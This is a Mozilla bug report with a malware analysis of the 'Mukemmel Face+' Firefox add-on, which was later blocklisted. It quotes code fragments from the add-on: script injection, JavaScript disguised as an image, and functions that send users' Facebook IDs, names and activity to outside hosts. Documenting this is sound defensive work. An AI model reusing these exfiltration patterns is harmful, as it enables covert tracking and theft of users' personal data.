Last Comment Bug 748993 - Malicious "Mukemmel Face+" add-on
: Malicious "Mukemmel Face+" add-on
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-04-25 15:07 PDT by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120425_mukemmelface.zip (90.12 KB, application/octet-stream)
2012-04-25 15:07 PDT, MarkH
no flags Details

Description MarkH 2012-04-25 15:07:12 PDT
Created attachment 618446 [details]
20120425_mukemmelface.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.163 Safari/535.19

Steps to reproduce:

Downloaded add-on from www.mukemmelface.com/firefox.html


Actual results:

loads "adobeflashplayer.js" from XPI

    code is based on the less malicious "SocialFixer" plugin

    looks to see if it's on a Facebook or Google domain

    uses HTML5 local storage plus cookies to maintain config/state

    injects a <script> tag to load http://hadi.mukemmelface.com/mukemmelface.js?amtasak=<random_num> when on Facebook
    
    or,  injects a <script> tag to load http://hadi.mukemmelface.com/g.js?amtasak=<random_num> when on Google
    
mukemmelface.js:

    loads your public details into the DOM via a call to graph.facebook.com/<uid>&callback=cins
    
    contains the spam URL http://hadi.mukemmelface.com/reklam.html
    
    injects either a <script> tag to load http://hadi.mukemmelface.com/offline.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
    
    ... or a <script> tag to load http://hadi.mukemmelface.com/zaza.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
    
    and a <script> tag to load http://gator1620.hostgator.com/~vazgec/1333458695713783.jpg
    
    
g.js:

    empty at the time the analysis was done
    
    
offline.js / zaza.js (same file):

    JS to install a font
    
    
1333458695713783.jpg:

    not an image file, but javascript
    
    sends your FB UID to http://get.buzzzapps.com/xpi/lechat/get_th.php?id_user="+FB_UID+"&ck="+userKey+"&me="+FB_UID (since this loads on every Facebook page load, it also sends the current Facebook URL you're viewing as a referrer, allowing them to track you on Facebook)

    has the ability to send your FB UID and name to http://set.buzzzapps.com/xpi/lechat/register.php?name='+FB_NAME+'&fbid='+FB_UID
    
    sends your FB UID to http://sp1.buzzzapps.com/sp/upload.php?id_user='+FB_UID+'
    
    sends your FB UID to http://ads2.buzzzapps.com/xpi/css/'+a+'/'+FB_UID+'.css
    
    makes an Ajax request to http://cdn.mukemmelface.com/MukemmelFace.js?amtasak=<random_number>
    
    injects ads by appending to the FB ad unit via "<iframe id='"+pubid+"_fr' src='"+reklam+"?umtt="+utma+"&umte="+USER_TYPE+"&ub="+SEXE+"' style='border:0px;margin-left:0px' width='230' height='620' scrolling='no' ></iframe>"
    
    sends your name and FB UID when you submit a bug report via http://set.buzzzapps.com/xpi/lechat/bugreport.php?message="&name="+FB_NAME+&fbid="+FB_UID
    
    sends your name and FB UID to http://get.buzzzapps.com/xpi/lechat/get_all.php?id_post="+tableau_aid+"&id_user="+FB_UID+
    
    posts details of what you do on Facebook via 
    
    function setPost(aid,what){   
        ajaxeur("http://set.buzzzapps.com/xpi/lechat/set.php?id_post="+aid+"&id_user="+FB_UID       
        +"&type="+what,vide, function(){});	
    }
    function unsetPost(aid,what){
        ajaxeur("http://set.buzzzapps.com/xpi/lechat/unset.php?id_post="+aid+"&id_user="+FB_UID
        +"&type="+what,vide, function(){});	
    }
    
    posts status updates to your Timeline / Wall


Expected results:

It shouldn't post your Facebook account information to a 3rd party server or post as you on Facebook without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-04-25 16:31:30 PDT
ID: {45147e67-4020-47e2-8f7a-55464fb535aa}
Comment 2 Jorge Villalobos [:jorgev] 2012-04-25 16:33:41 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i86

Note You need to log in before you can comment on or make changes to this bug.